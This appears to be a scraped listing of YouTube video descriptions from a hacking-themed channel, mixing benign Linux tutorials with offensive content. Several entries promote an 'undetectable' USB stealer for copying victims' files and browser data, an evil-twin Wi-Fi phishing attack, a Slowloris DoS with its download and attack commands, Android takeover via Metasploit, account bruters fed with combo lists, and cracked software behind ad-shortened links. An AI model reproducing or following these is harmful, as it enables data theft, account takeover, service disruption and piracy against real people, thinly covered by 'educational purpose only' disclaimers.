Home
Videos uploaded by user “SrbinHacking”
How to Spoof MAC Address on Android Device [Root Required]
 
02:11
This video is educational purpose only! I'm not responsible for any damage you do or take. Experiment, and use this tutorial only for education, on your own local machine! BusyBox (Download Link): http://adf.ly/1ikrDK Terminal (Download Link): http://adf.ly/1ikrH8 Even though MAC address is embedded on the hardware device during manufacture, it can still be spoofed to input a new one of your choice. Here is a detailed instruction on how to spoof MAC address on your Android phone. Before you spoof the MAC address, you need to record the original/current MAC address of your device which can be done according to the instruction below: 1. On the Home Screen of your phone, tap Menu button and go to Settings. 2. Tap About Device and go to Status. 3. Now scroll down to record the 12-digit code shown under Wi-Fi Mac address. Commands used in this tutorial: - su [HIT ENTER] - busybox iplink show eth0 [HIT ENTER] - busybox ifconfig eth0 hw ether aa:aa:aa:aa:aa:aa [HIT ENTER] Enjoy! ;)
Views: 20081 SrbinHacking
How to Setup WiFi Hotspot/Access Point | Kali Linux
 
01:16
Learn how to share your WiFi on Kali linux in few easy steps. setup hotspot on kali setup hotspot on kali linux hotspot on kali access point on kali linux access point on kali setup access point on kali create wifi hotspot on kali share wifi on kali share wifi on kali linux how to create hotspot on kali linux how to create wifi hotspot on kali how to create wifi access point on kali how to share wifi on kali how to share wifi on kali linux
Views: 16963 SrbinHacking
Grep Command - Practical Examples | Linux
 
06:51
Grep is a powerful program for searching through text. Grep means 'Global Regular Expression Print'. Basically grep searches text files for the specified regular expression and outputs any line containing a match to standard output.
Views: 8584 SrbinHacking
Install VeraCrypt (aka TrueCrypt) on Linux OS | Tutorial
 
04:00
VeraCrypt is a free disk encryption software. During a penetration test, you will have access to sensitive client information, including exploitable vulnerabilities and copies of successfully breached data. It is the tester's legal and moral responsibility to ensure that this information in his care is secured at all times. The best means of meeting this responsibility is to ensure that all client information is encrypted during storage and transmission. And in this tutorial you'll learn how to ensure the security of those information. Download Link(VeraCrypt aka TrueCrypt): http://adf.ly/1naP4F VeraCrypt TrueCrypt Installation Install veracrypt install veracrypt on linux step by step guide veracrypt how to install veracrypt how to install veracrypt on linux setup veracrypt on linux Install truecrypt install truecrypt on linux step by step guide truecrypt how to install truecrypt how to install truecrypt on linux setup truecrypt on linux
Views: 3362 SrbinHacking
USB Stealer [Pictures, Videos, Documents, Texts] [FUD] [No Servers]
 
04:40
USB Stealer is great thing for everyone who want's to easily steal different kind of informations just by inserting an USB flash drive on victim's computer. Download link: http://adfoc.us/29065055728289 FEATURES Fully undetected 100% Batch code easy setup Works with windows xp, vista, 7, 8 runs silently in the background copies files fast No Servers No trace left No Process shown makes a beep sound once when finished STEALS Text Messages (Iphone Backup) system info Processes running favorites documents Pictures videos .exe minecraft lastlogin downloads mozilla firefox file dump Internet Explorer file dump google chrome file dump SETUP 1. Put the files into a usb flash drive (the biggest size you have, you may run out of space) 2. Insert usb into computer you want to pull files from. 3. Run the silent.vbs script, NOT the .exe 4. Wait for it to copy the files, it goes in the following order: info, pics, texts,videos, documents, various dumps. 6. DONE!
Views: 22325 SrbinHacking
How to Hack WPA/WPA2 - Linset Evil Twin Attack with Phishing
 
06:43
This video is educational purpose only! I'm not responsible for any damage you do or take. Experiment, and use this tutorial only for education, on your own local machine! In this tutorial you will learn how to get WPA/WPA2-psk passwords with Linset (Evil twin attack) with phishing page. Basically, what this program does is that it copies your targets MAC address, channel number, essid and use it to create fake access point (Evil twin attack). Also it captures 4-way handshake, which will you use to get the password with phishing page you automatically made. In final steps of this tutorial, Linset will automatically create your evil twin, and it will start DOS attack on the REAL(original) access point, so that all the clients which were connected will be DISCONNECTED, and automatically redirected to your fake AP (If signal is strong enough). After they successfully connected to your trap, they will get phishing page to repeat their WPA/WPA2 password, and when they do that, you are DONE! Enjoy! :)
Views: 6995 SrbinHacking
Trape - People Tracker Tool | Kali Linux
 
04:17
Trape is a recognition tool that allows you to track people, the information you can get is very detailed. We want to teach the world through this, as large Internet companies could monitor you, obtaining information beyond your IP. Some benefits: * One of its most enticing functions is the remote recognition of sessions. You can know where a person has logged in, remotely. This occurs through a Bypass made to the Same Origin Policy (SOP) * Currently you can try everything from a web interface. (The console, becomes a preview of the logs and actions) * Registration of victims, requests among other data are obtained in real time. * If you get more information from a person behind a computer, you can generate a more direct and sophisticated attack. Trape was used at some point to track down criminals and know their behavior. * You can do real time phishing attacks * Simple hooking attacks * Mapping * Important details of the objective * Capturing credentials * Open Source Intelligence (OSINT) Recognizes the sessions of the following services * Facebook * Twitter * VK * Reddit * Gmail * tumblr * Instagram * Github * Bitbucket * Dropbox * Spotify * PayPal * Amazon * Foursquare (new) * Airbnb (new) * Hackernews (new) * Slack (new) Download Link (GitHub): http://q.gs/E3rDh Subscribe for more educative content!
Views: 1239 SrbinHacking
Linux Command Line Tutorial #9 - Standard Output & Error Redirection
 
14:14
Linux Command Line Tutorial #9 Content: :# Introduction :# About Standard Input, Output and Error :# Redirecting Standard Output (stdout) :# Redirecting Standard Error (stderr) :# Redirecting Stdout and Stderr To One File :# Redirection Orders :# Unwanted Output /dev/null About: In this tutorial we are going to unleash what may be the coolest feature of the command line. It's called I/O redirection. The I/O stands for input/output and with this facility you can redirect the input and output of commands to and from files, as well as connect multiply commands together into powerful command PIPELINES. Precisely in this tutorial I'm going to cover Standard Output and Error, but not Input, because there are many different subjects I need to cover in standard input, and it is much better for understanding if I just split "std output and error" in one, and "standard input" in other video tutorial. Linux Command Line Tutorial's Playlist: http://adfoc.us/29065060897619 Support me: https://www.patreon.com/srbinhacking Subscribe my channel for more educative videos!
Views: 2349 SrbinHacking
Linux Command Line Tutorial #6 - Hard and Symbolic(Soft) Links
 
10:27
Linux Command Line Tutorial #6 Content: :# Hard Links :# Symbolic Links :# Difference Between Hard & Symbolic Links :# Their Main Characteristics :# Linux Commands For Creating Them About: In this tutorial I will be talking about hard and symbolic links. Another name for Symbolic link is Soft link, you can use both of them, its not wrong. I will teach you the difference between those two link types, their main characteristics, and ofcource Linux commands for making them. Linux Command Line Tutorial's Playlist: http://adfoc.us/29065060897619 Support me: https://www.patreon.com/srbinhacking Subscribe my channel for more educative videos!
Views: 894 SrbinHacking
How to Make Banner/Welcome Logo in Terminal - Kali
 
01:21
Learn how to put random text in your terminal everytime you open it. Very easy, watch the tutorial to find out. Enjoy.
Views: 688 SrbinHacking
WAN Hacking using SETOOLKIT | Kali Linux
 
03:48
This video is for educational purposes only! We were always conducting attacks on local area network, check out this video to find out how to be a penetration tester on Wide Area Network (WAN). Download ngrok (Official Website): http://adf.ly/1oFrk3
Views: 461 SrbinHacking
Recuva - Recover Deleted/Lost Files | USB - HDD - Memory Card | Portable Version
 
03:25
If you have accidentally deleted an important file or lost files after a computer crash, Recuva will recover files from your Windows computer, recycle bin, digital camera card, or MP3 player! Unlike most file recovery tools, Recuva can recover files from damaged or newly formatted drives. Greater flexibility means greater chance of recovery. Recuva can recover pictures, music, documents, videos, emails or any other file type you’ve lost. And it can recover from any rewriteable media you have: memory cards, external hard drives, USB sticks and more! Direct Download: http://adf.ly/1ikqPL Official website: http://adf.ly/1ikqUr Support me: https://www.patreon.com/srbinhacking Subscribe my channel for more educative videos!
Views: 1974 SrbinHacking
Install Bash on Windows 10 [Tutorial]
 
05:56
Requirements (Steps): - Windows 10 Anniversary Update (build 14393, posted August 2, 2016) - Join Windows Insider Program: http://adf.ly/1mBk9h - Enable Developer Mode - Check: 'Windows Subsystem for Linux (Beta)' - Restart your PC - Install Bash - DONE! Learn how to install Bash on your Windows 10 operative system. Easy, Free and Fast.
Views: 514 SrbinHacking
Fix Setoolkit phishing/cloning website issue - Kali Linux 2.0
 
04:10
This video is educational purpose only! I'm not responsible for any damage you do or take. Experiment, use this tool only for education. As you know, on Kali Linux 2.0, there is one issue with Setoolkit. Apparently when you try to clone website in order to performe phishing attack, there is one problem. Instead of cloned website, you will get some apache default page. But with this tutorial you will learn how to easily fix that. Watch the video to find out! Enjoy! ;)
Views: 9253 SrbinHacking
Devploit - Reconnaissance Tool | Kali Linux
 
02:45
Devploit is a simple and powerful tool for information gathering. Download Link(GitHub): http://q.gs/E2eMK Features: - DNS Lookup - Whois Lookup - Revrse IP Lookup - GeoIP Lookup - subnet Lookup - Port Scanner - Extract Links - Zone Transfer - HTTP Header - Host Finder - IP-Locator How to use it: - cd Devploit - chmod +x install - ./install - Run in Terminal - Devploit
Views: 203 SrbinHacking
wget - File Download Command-Line Utility - Linux OS
 
11:37
In this tutorial I'm going to show you the use of "wget" file download command-line utility. Download from one page to whole website. Crawl/mirror complete website with just one line of code. I will introduce you few interesting options which goes along with wget utility, which are "Download speed restriction", "Maximum quota", "Output log redirection", "Output file name". Subscribe my channel for more educative videos!
Views: 1945 SrbinHacking
Password Protect USB Device [How To]
 
02:28
Learn how to protect your USB device with password. Protect your files. Rohos Mini Drive: http://atominik.com/sro USB flash drive encryption benefits: *Creates a encrypted partition or container on USB flash drive or portable HDD. *Encrypted partition is protected by a password. *1Encryption is automatic and on-the-fly. AES 256 bit key length. Uses NIST compliant encryption standards. *Portable Rohos Disk Browser allows using an encrypted partition on any PC without the need to have administrator privileges or install software. *Doesn’t left un-encrypted data in temp folder, registry and recent documents list, thanks to on-the-fly encryption and file virtualization technology; *Secure virtual keyboard – protect the password to an encrypted disk from a keylogger. Free Edition limit – 8 GB encryption size only
Views: 390 SrbinHacking
How to install Kali 2.0 on VMware Workstation [Tutorial]
 
11:55
YOU CAN GIVE ME IDEAs FOR MY NEXT VIDEO!!! Fill in this google questionnaire :) http://goo.gl/forms/kgEHkPJ7yl Download Kali 2.0 (Official website): http://adfoc.us/29065055849728 -Like -Share -Subscribe for more videos!
Views: 92 SrbinHacking
How To Detect MiTM Attacks On Your WiFi Network | Android
 
01:07
A quick way to easily detect hackers and attackers on your WiFi network by checking for ARP cache. Download link: http://adfoc.us/29065060159678 If you like my video, please hit like, share and subscribe me. If you dont, feel free to comment a reason, so I can improve the video, or anything. Your feedback is very important to me.
Views: 1116 SrbinHacking
How to Harvest Email addresses from a Website - Kali Linux
 
01:36
This video is educational purpose only! Easy tutorial from which you can learn how to harvest email addresses from a website, with tool named "theharvester" on kali linux.
Views: 1692 SrbinHacking
Aspell - Interactive Spell Checker - Linux OS
 
07:42
Aspell is an open source spell checker, it is fast and reliable. It can be very useful for correcting spell errors in many different file types: HTML documents, Text files, Emails, C/C++ programs and many other specialized texts. You don't need to install this program separately, it is incorporated in OS. Aspell Official Website: http://adfoc.us/29065061020612 Subscribe my channel for more educative videos!
Views: 1101 SrbinHacking
How to Crack WPS pin with minidwep-gtk  - WifiSlax
 
03:48
This video is educational purpose only! I'm not responsible for any damage you do or take. Experiment, try and learn only with your local machine. Requirements: -Wifislax Live CD (Download) : http://adfoc.us/29065057556559 -VM ware workstation -Brain In this tutorial you will learn how to crack WPS pin with minidwep-gtk. It is very easy to use. No typing commands required. If you dont know how to install/use WifiSlax on vmware, go to my videos, and search for tutorial about it. Enjoy!
Views: 8233 SrbinHacking
Slowloris - DOS Attack with Kali Linux [Tutorial]
 
03:15
YOU CAN GIVE ME IDEAs FOR MY NEXT VIDEO!!! Fill in this google questionnaire :) http://goo.gl/forms/kgEHkPJ7yl In this video, I'm showing you how to use slowloris dos attack on kali linux. It's very simple, basicly you just need two commands: 1. wget ha.ckers.org/slowloris/slowloris.pl = Download (This commands is for downloading the perl script) 2. perl slowloris.pl -dns [VULNERABLE WEBSITE URL] -port 80 -timeout 2 = Attack (And with this command you will start the attack) LIKE! SHARE! SUBSCRIBE!
Views: 4582 SrbinHacking
Image Forensic Analysis Tool | Katana Framework
 
05:21
In this video you'll learn how to successfully analyse imaga file and gather every piece of information from it. We will be using Katana Framework. Katana is a framework written in python for making penetration testing, based on a simple and comprehensive structure for anyone to use, modify and share, the goal is to unify tools serve for professional when making a penetration test or simply as a routine tool, The current version is not completely stable, it's recommended to update every time that you will use it (ktf.update -f). Katana Framework(Download): http://q.gs/E4OtN Subscribe my channel for more educative content!
Views: 317 SrbinHacking
Dymerge - Dictonary Merger/Combiner Tool | Kali Linux
 
04:10
A dynamic dictionary merger for successful dictionary based attacks. A simple, yet powerful tool - written purely in python - which takes given wordlists and merges them into one dynamic dictionary that can then be used as ammunition for a successful dictionary based (or bruteforce) attack. GitHub Link (Dymerge): http://q.gs/E3jKj Subscribe my channel for more great videos!
Views: 88 SrbinHacking
Havij v1.16 Pro Portable - Cracked | FREE
 
01:56
Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page. This software is the best way to start with SQL injection if you are a beginner. Of course, this is more easy to use a automated SQL tool like Havij that hack a database website with a SQl injection manually. That's why I'm going to share with you this amazing little tool. Download link: http://adf.ly/1huEcB Enjoy!
Views: 5735 SrbinHacking
How to perform DOS attack on Wi-Fi access point - Kali Linux
 
06:03
This video is educational purpose only. I'm not responsible for any damage you do or take. Experiment, work and practice with your local machines only! Requirements: -Kali Linux -WiFi adapter (If you are using kali linux on virtual machine, then you will need to have 2 WiFi adapters) -Brain In this tutorial, you'll learn how to perform DOS attack on wifi hotspot, by sending deauthentication packets.
Views: 1211 SrbinHacking
How to hide text in picture with windows command prompt - easy - [Tutorial]
 
04:37
YOU CAN GIVE ME IDEAs FOR MY NEXT VIDEO!!! Fill in this google questionnaire :) http://goo.gl/forms/kgEHkPJ7yl Hiding text within an image file is one of the tricks used in Steganography. Using this trick you can hide any text information or a message within an image file irrespective of the fact that how long your information or message is This is a simple and easy tutorial for all windows users, on how to hide text in picture(image) file. This is very usfull for those who want to send some secret information to someone, without sharing with others. Could come in handy. ENJOY! ;)
Views: 791 SrbinHacking
Easy-Hide-IP VPN [Cracked Version 2017] FREE
 
02:31
Watch the video to learn how to use "Easy-Hide-IP VPN" software for FREE! You DONT need to PAY to get this software, in order to get anonymous! Temporary Anonymous Email: http://adf.ly/1huFmt Download link: http://adf.ly/1huFea
Views: 73316 SrbinHacking
Email AutoResponder Professional [FREE] [Cracked]
 
02:14
Email Autoresponder is an easy desktop email marketing software that delivers your auto responders ranging from the simplest "I'm out of office" to personalized HTML messages and newsletters. Key Features: 1. Powerful Contact Lists Management 2. Powerful HTML Editor: Flash, Images, Attachments. 3. Looping protection 4. Processes bounced emails Download installer: http://adfoc.us/29065060383832 Download .dll file: http://adfoc.us/29065060381301
Views: 225 SrbinHacking
Pegasus VPN | Working + FREE | 2017
 
02:23
In this video I'm going to show you "Pegasus VPN" which is totally FREE. So if you are looking for free way to hide your IP address then this little software can help you. Pegasus VPN : http://adf.ly/1ikqcV Support me: https://www.patreon.com/srbinhacking Subscribe my channel for more educative videos!
Views: 2868 SrbinHacking
Command Line Editing - Linux Guide
 
08:20
In this tutorial you will learn a few tricks to ease up your work by not lifting your hands from keyboard and never touching your mouse while working on the command line. You are going to learn shortcut commands for: -Cursor movement -Text editing -Cut and paste Knowledge presented in this tutorial will help you work faster on the command line. Download Table Images from this video: http://adf.ly/1muImI
Views: 288 SrbinHacking
AddMeFast iMacros Scripts for Instagram - Free  | 2017
 
01:30
AddMeFast iMacros Scripts for instagram like and follow. Free download, no survey. Enjoy. AddMeFast iMacros Scripts(Download): http://adf.ly/1nf5vS addmefast imacros script addmefast imacros script free addmefast imacros script free download addmefast script addmefast scripts addmefast instagram addmefast instagram like addmefast instagram follow addmefast unlimited points addmefast automated addmefast bot addmefast cheat addmefast program how to get addmefast points how to get unlimited addmefast points
Views: 3507 SrbinHacking
Wifresti - Recover your WiFi Password | Linux | WIndows | MAC OS
 
02:08
Find your wireless network password from Windows , Linux and Mac OS Wifresti is a simple Wi-Fi password recovery tool , compatible with Windows , and Unix systems (Linux , Mac OS) . #Features * Recover Wifi password on Windows * Recover Wifi password on Unix #Requirements * An operating system (tested on Ubuntu, Windows 10,8,7) * Python 2.7 #Instalation * sudo su * git clone https://github.com/LionSec/wifresti.git && cp * wifresti/wifresti.py /usr/bin/wifresti && chmod +x /usr/bin/wifresti * sudo wifresti Dowload Link(Github): http://q.gs/E2qDf
Views: 207 SrbinHacking
Google Hacks - Information Gathering Lesson
 
02:49
This video is educational purpose only. I'm not responsible for any damage you do or take. A simple video presentation about Google Hacks and gathering informations. Learn how to use various search operators to narrow down search results. Also you can check out Google Hacking Database for more search operators. PowerPoint Presentation (Download Link): http://adfoc.us/29065058147710 Google Hacking Database: http://adfoc.us/29065058116644
Views: 436 SrbinHacking
How to locate your stolen/lost smartphone + Remote Control It [Tutorial]
 
04:22
YOU CAN GIVE ME IDEAs FOR MY NEXT VIDEO!!! Fill in this google questionnaire :) http://goo.gl/forms/kgEHkPJ7yl Steps: 1. Download the Lost Android application here: https://play.google.com/store/apps/details?id=com.androidlost&hl=sr 2. Request administrator rights when you open the app (Use the same gmail on your smartphone and on the website) 3. Login on the Lost Android website: http://adfoc.us/29065055728320 4. DONE! Enjoy! :)
Views: 394 SrbinHacking
Red Hawk -  Information Gathering & Vulnerability Scanning Tool | Kali Linux
 
03:38
All in one tool for Information Gathering, Vulnerability Scanning and Crawling. A must have tool for all penetration testers. Red Hawk Download Link: http://adf.ly/1o7eBt FEATURES: Basic Scan Site Title NEW IP Address Web Server Detection IMPROVED CMS Detection Cloudflare Detection robots.txt Scanner Whois Lookup IMPROVED Geo-IP Lookup Grab Banners IMPROVED DNS Lookup Subnet Calculator Nmap Port Scan Sub-Domain Scanner IMPROVED Sub Domain IP Address Reverse IP Lookup & CMS Detection IMPROVED Hostname IP Address CMS Error Based SQLi Scanner Bloggers View NEW HTTP Response Code Site Title Alexa Ranking Domain Authority Page Authority Social Links Extractor Link Grabber WordPress Scan NEW Sensitive Files Crawling Version Detection Version Vulnerability Scanner Crawler MX Lookup NEW Scan For Everything - The Old Lame Scanner
Views: 171 SrbinHacking
How to generate Wordlist with Crunch - Kali Linux
 
02:06
This video is educational purpose only! Crunch is tool pre-installed on Kali linux. And it's very easy to use, for making wordlists. Commands: crunch 4 6 abdc -o /root/Desktop/wordlist.txt 4 is used for minimum word lenght 6 is used for maximum word lenght -o Is used for specifying destination for wordlist
Views: 207 SrbinHacking
League of Legends Account Checker/Bruter [2017 Still Working] [Tutorial]
 
03:46
YOU CAN GIVE ME IDEAs FOR MY NEXT VIDEO!!! Fill in this google questionnaire :) http://goo.gl/forms/kgEHkPJ7yl This is fully working "League Of Legends Account Checker" as you can see in the video, I showed you how it works. It's not hard to use. Double click on the first text box to load combo list, double click on the second text box to save your work, select region (very important) cuz if you select working account with wrong region, the program will show you like it's not working. Download link: http://adf.ly/1il8HL ENJOY! ;)
Views: 14545 SrbinHacking
tar Archiving Utility - Practical Examples | Linux
 
06:05
Tar program is the classic tool for archiving files. Its name, short for tape archive, reveals its roots as a tool for making backup tapes. Learn by watching me showing you practical examples of tar archiving utility. Useful tip: Unless you are operating as the superuser, files and directories extracted from archives take on the ownership of the user performing the restoration, rather than the original owner.
Views: 175 SrbinHacking
Kaspersky TDSSKiller | Portable
 
02:26
Kaspersky TDSSKiller PORTABLE Kaspersky TDSSKiller fights malware in the Rootkit.Win32.TDSS family. It can remove associated rootkits and bootkits. Kaspersky TDSSKiller is not a substitute for a standard antivirus utility. TDSSKiller is freeware for personal and business use and requires admin rights. Features The TDSSKiller utility fights malware family Rootkit.Win32.TDSS, bootkits and rootkits. While not a full-blown antivirus package, it can be useful when removing rootkits from infected PCs with outdated or no protection installed. Download: http://adf.ly/1ikpuf
Views: 674 SrbinHacking
How To Stop Windows 10 From Spying On You | Tutorial
 
04:39
In this tutorial I will cover few important things you should do if you want to protect your privacy on windows 10. Windows 10 is good, but if you disable all options which violate your privacy, and with this short video you will learn how to do it. NOTE: Remember that you CAN'T disable windows update unlike on Windows 7 & 8, that's the sad part. And after every windows update you should again check your privacy settings, because those updates could retrive the old settings which you disabled already. Microsoft will probably force you to enable settings in order to gather informations about you, so you should remember that. Spybot Anti-Beacon (Download link): http://adfoc.us/29065060133765 Enjoy! Like my video if you like it, and dislike if you dont ;) Comment, ask for more tutorials you would like to see on my channel, and I will consider everyones advice. Cheers!
Views: 490 SrbinHacking
Hack Android Smartphone with Metasploit - Kali Linux
 
05:46
Learn how to hack android smartphone using metasploit on kali linux. Note: Don't get confused, I have changed the apk name to shell on android. Some of the options which you can use: -SMS_Dump -Calllog_Dump -Contacts_Dump -Geolocation -Record microphone -Camera screanshot -Download files -Upload files and more...
Views: 819 SrbinHacking
How to Recover Deleted Images from USB, HDD or Any Other Device - Kali Linux 2.0
 
05:14
In this tutorial you'll learn how to recover deleted jpg's from USB, HDD or any other device which has memory to store files ofc. With Kali Linux 2.0. Enjoy!
Views: 579 SrbinHacking
Wireshark Network Analysis - Sniffing, Capturing packets, Grabbing informations [Tutorial]
 
08:49
YOU CAN GIVE ME IDEAs FOR MY NEXT VIDEO!!! Fill in this google questionnaire :) http://goo.gl/forms/kgEHkPJ7yl This is a tutorial about using wireshark. You will learn how to simply capture packets, how to sniff login informations, how to capture cookies and planty of other usefull informations. You can make a hotspot without password, and just wait for someone to get on your wifi hotspot, and then start the wireshark to look for the websites the victim is visiting, and anything else. WHAT IS COOKIE? An HTTP cookie (also called web cookie, Internet cookie, browser cookie or simply cookie, the latter which is not to be confused with the literal definition), is a small piece of data sent from a website and stored in a user's web browser while the user is browsing that website. Every time the user loads the website, the browser sends the cookie back to the server to notify the website of the user's previous activity.[1] Cookies were designed to be a reliable mechanism for websites to remember stateful information (such as items in a shopping cart) or to record the user's browsing activity (including clicking particular buttons, logging in, or recording which pages were visited by the user as far back as months or years ago). Source: Wikipedia Download wireshark: http://adfoc.us/29065055962668 ENJOY! ;)
Views: 5182 SrbinHacking
How to Check Internet Speed with Linux terminal
 
02:00
This is easy tutorial on how you can easily check internet speed with linux terminal. Commands used: 1. Install python-pip package: "apt-get install python-pip" 2. Install speedtest-cli via pip: "pip install speedtest-cli" 3. Command for running the SpeedTest: "speedtest-cli" Enjoy. :)
Views: 441 SrbinHacking
The Best Free Anti-Virus - 360 Total Security [With Avira & BitDefender Scan Engine]
 
07:57
YOU CAN GIVE ME IDEAs FOR MY NEXT VIDEO!!! Fill in this google questionnaire :) http://goo.gl/forms/kgEHkPJ7yl 360 Total Security comes in five layers of protection, of which 4 are related to antivirus protection and one for testing and patching system problems caused by the activity on the computer malware or users. 4 levels of antivirus protection, two are activated immediately after installation and that the two 360 cloud-based scanner, one standard and one cloud scanner that monitors suspicious behavior on your computer ... Avira and Bitdefender are not activated by default, but you must activate them manually. I've been reading the various forums and what I can see, it only these two default one mechanism 360 which almost anything goes, but why are not additionally provide protection and virus definitions based on these two excellent antivirus solution especially if you are known to be not significantly burden the system . Inside this AV, you have: 1. SandBox 2. SpeedUp 3. CleanUp 4. PatchUp 5. System Backup Cleaner 6. Browser Protection and lot's of more fetures.... Download link (For PC): http://adfoc.us/29065056047808 Download link (For Android): http://adfoc.us/29065056036628 I can guarantee you, that you will love this Anti-Virus! ;) ENJOY! :)
Views: 2882 SrbinHacking
HawkEye Bruter/Cracker/Checker/Scraper [Cracked] [FREE]
 
03:20
YOU CAN GIVE ME IDEAs FOR MY NEXT VIDEO!!! Fill in this google questionnaire :) http://goo.gl/forms/kgEHkPJ7yl HawkEye BruteCrack official website: http://hawkeyeproducts.com/brutecrack HawkEye BruteCrack is a simple cracker that is fully modular allowing third-party cracker to be added. Its includes everthing from cracking a password list to username scrapers. Features (Brute/Crack): Ability To Crack AIM via username and email Ability To Crack Facebook via email Ability To Crack Hulu via email Ability To Crack Instagram via username and email Ability To Crack LOL (EUW/NA) via username Ability To Crack Netflix via email Ability To Crack Origin via username and email Ability To Crack Skype via username Ability To Crack Steam via username Ability To Crack Spotify via username and email Ability To Crack Twitter via username Ability To Crack Vine via emai Features (Scraper): Ability To Scrape Facebook via email Ability To Scrape PlanetMineCraft via username Ability To Scrape Twitter via username Ability To Scrape Spotify via username Ability To Scrape Steam via username Features (Checker): Ability To Check Spotify via username Ability To Check Steam via username Ability To Check via username Ability To Check Origin via username Ability To Check Skype via username AIM Facebook Hulu Instagram LOL (EUW / NA) Netflix Origin Skype Steam and more... DOWNLOAD LINK: http://adfoc.us/29065055728349 ENJOY! ;)
Views: 3550 SrbinHacking
USB Stealer Linux OS - Script |  .pdf .txt .png .jpg | Files
 
05:54
Well this USB stealer is not the same as in Windows OS, because on Linux you don't have permission to run scripts direct from USB. That's why you would need to copy script from USB to desktop for example, give permission to it and then just run the script! So whats the purpose of this script, what it actually does? Well, script is checking for .pdf .txt .png. .jpg files in Desktop, Documents, Downloads and Pictures directories. If the script run into .pdf .txt .png .jpg files in the mentioned directories it will immediately copy them to your USB drive, and you will see bold green text "Successful" in your output. And if there are no any of mentioned files in one of the directories, script will let you know about that by printing simple text in your output, and will continue to look for those files in some other directories. How to use it? 1. Change "UUI" name from this script to the name of your USB drive. 2. Copy script to the 'victim' Desktop(example). Navigate to Desktop. Change script permission to 755. Run the script. 3. DONE! Source code (Github): http://adfoc.us/29065060826265
Views: 846 SrbinHacking
Real-Time Process Monitoring - Linux Guide
 
07:19
Introduction to real-time process monitoring. Learn more about top command. In my next video tutorial I'm going to talk about stopping the processes. Download Table(img): http://adf.ly/1mwNea
Views: 603 SrbinHacking